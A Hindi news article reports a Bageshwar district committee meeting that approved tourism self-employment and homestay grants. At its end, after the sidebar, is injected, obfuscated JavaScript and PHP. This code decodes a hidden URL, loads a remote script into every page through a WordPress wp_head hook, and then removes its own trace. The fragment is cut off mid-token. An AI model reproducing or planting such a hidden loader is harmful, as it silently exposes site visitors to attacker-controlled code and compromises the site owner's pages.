Saturday, July 27, 2024
spot_img

बागेश्वर : जिलाधिकारी की अध्यक्षता में जिला स्तरीय समिति द्वारा वीर चन्द्र सिंह गढ़वाली पर्यटन स्वरोजगार योजना की बैठक

बागेश्वर ::::- मंगलवार को कलेक्ट्रेट सभागार में जिलाधिकारी अनुराधा पाल की अध्यक्षता में जिला स्तरीय समिति द्वारा वीर चन्द्र सिंह गढ़वाली पर्यटन स्वरोजगार योजना वाहन मद में 02, गैर वाहन मद 02, होम स्टे 05 व टै्रकिंग ट्रक्शन सेंटर होम स्टे अनुदान योजना में 10 कुल 19 को लाभार्थियों 2 करोड, 35 लाख, 8 हजार, 867 की स्वीकृति दी गयी।

जिलाधिकारी ने संबंधित अधिकारियों को निर्देशित किया कि स्वरोजगार के लिए आ रहे आवेदनों की भलीभांति जांच कर आवेदको को योजना से लाभांवित करें। उन्होंने लीड़ बैंक अधिकारी को निर्देश दिये कि वे सभी बैंक प्रबंधकों से स्वंय संपर्क कर विभिन्न बैंको को भेजे जा रहें आवेदन पत्रों को समय से निस्तारित कराना सुनिश्चित करें, ताकि बेरोजगारों को सरकारी योजनाओं से जोड़कर लाभान्वित किया जा सकें।

समिति द्वारा गैर गैर वाहन मद में 02 प्रार्थना पत्रों पर 50 लाख, 33 हजार 539, वाहन मद में 02 प्रार्थना पत्रों पर 27 लाख, 50 हजार 328 तथा दीन दयाल उपाध्याय गृह आवास होमस्टे योजना में 05 आवेदन पत्रों पर 01 करोड़, 50 लाख के साथ ही टै्रकिंग ट्रक्शन सेंटर होम स्टे योजना में 10 आवेदन पत्रों के लिए 07 लाख 25 हजार की स्वीकृत कर विभिन्न बैंको को भेजे गए। इस दौरान उन्होंने वीर चंद्र सिंह गढ़वाली स्वरोजगार योजना में वाहन मद के साक्षात्कार में संबंधित आवेदको से वाहन, व्यवसायिक व कार्यक्षेत्र के बारे में संपूर्ण जानकारी भी ली।

जिलाधिकारी ने कहा कि बेरोजगारों को स्वरोजगार से जोड़ना सरकार की प्राथमिकता है। उन्होंने स्वरोजगार हेतु इच्छुक व्यक्तियों को विभिन्न योजना के तहत अधिक से अधिक स्वरोजगार मुहैया कराने के निर्देश अधिकारियों एवं बैकर्स को दियें।

बैठक में जिला विकास अधिकारी संगीता आर्या, लीड बैंक अधिकारी एनआर जौहरी, महाप्रबंधक उद्योग जीपी दुर्गापाल, अधिनियम आरडब्लूडी आर चन्द्रा, कर अधिकारी हरीश रावल, जिला पर्यटन विकास अधिकारी कीर्ति आर्या व आवेदक आदि मौजूद थे।

Related Articles

- Advertisement -spot_img

ताजा खबरे

eInt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>